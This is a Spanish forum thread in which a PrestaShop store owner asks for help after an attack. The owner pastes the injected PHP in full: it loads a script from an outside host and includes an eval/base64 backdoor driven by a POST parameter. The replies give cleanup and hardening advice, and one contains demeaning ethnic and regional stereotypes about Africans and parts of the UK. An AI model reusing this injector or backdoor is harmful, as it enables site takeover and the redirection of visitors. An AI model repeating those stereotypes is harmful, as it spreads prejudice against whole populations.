Ataque a mi tienda Prestashop (Ayuda Urgente)

[Milton]

Hola:

 

Estimados amigos del foro solicito su ayuda tengo una tienda viejita versión 1.1.0.5 y comenzó a ser atacada desde la semana pasada.

 

Los archivos atacados son los de idioma que se encuentran en cada carpeta de todos los módulosestos la que principalmente ha sido atacada.

 

El código que han inyectado es el siguiente

 

 

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

 

 

Que puedo hacer para proteger mi tienda, me comento mi proveedor que el ataque fue por que utilizaron una vulnerabilidad de NO_BODY.

 

 

 

Gracias!!!

[guest*]

Como un ejemplo: actualizar a la última versión. OS (open source) software siempre debe ser acutalizada.

[neokid]

Aunque te vaya bien con tu versión yo te recomiendo como el compañero anterior que actualices. Las últimas versiones de PS traen nuevas formas de protección y habrán tapado muchas vulnerabilidades de versiones tan arcaicas.

[Dimar]

versión 1.1.0.5?? mejor que instales la ultima version y subas toda la tienda, porque con ese ataque capas y haya metido algun otro codigo o un archivo.

[Luar]

Lo primero, revisa el log de apache (si es lo que usas) y detecta que ip te esta atacanado, luego le colocas en deny.host y de momento ese fulano lo tendra mas dificil en lo que como te dice todo el mundo, actualices que es FUNDAMENTAL, por otro lado revisa los logs del error.log TODOS LOS DIAS hasta que lo resuelvas y ve denegando ips.

[tamu secreto]

Con cada actualización los Open Sources establecen en un archivo cambios o changelo las mejoras y soluciones de seguridad, esta información es utilizada también por personas mal intencionadas.

 

Tambien utilizan scaneres, pero mas utilizada es la técnica que consite en liberar modulos vulnerables para luego usarlo como puertas de entrada, por ello no utilices modulos descargados de redes P2P como ares, emule etc,

Tampoco utilices themes bajados de este de redes P2P .

 

Otra técnica poco menos utilizada es la inserción de imágenes con shell, normalmente los ingresan en los themes, también hay empresas que controlan sus themes via shell, por ello no utilices themes de pagos que no hayas comprado.

 

Lo mejor que puedes hacer es COMENZAR DESDE CERO.

y no vuelvas a dejar tu tienda sin actualizar!!

Y HAS UN BACKUP DIARIO!!

 

Es lo mejor en tu caso, ya que puedes ocasionar daños a tus clientes, pues si se inyectaron a tu BD es probable que los datos de tus clientes estén siendo utilizados para técnicas Phishing , para robarles contraseñas de tarjetas, etc etc ...

 

Busca en log de pache los orígenes del ataque, luego en tu nueva tienda restringe esos países, normalmente suelen provenir de costa marfil y de los países de África y ciertas zonas del reino unico. Estas zonas son marginales, donde viven prostitutas, ladrones, usureros y toda la lacra social de esos países.

 

saludos

 

PD: yo instale todo desde cero perdi como dos mil registros, pero era mejor asi,

ahora hago una copia de seguridad diaria. y no dejo de actualizar!!!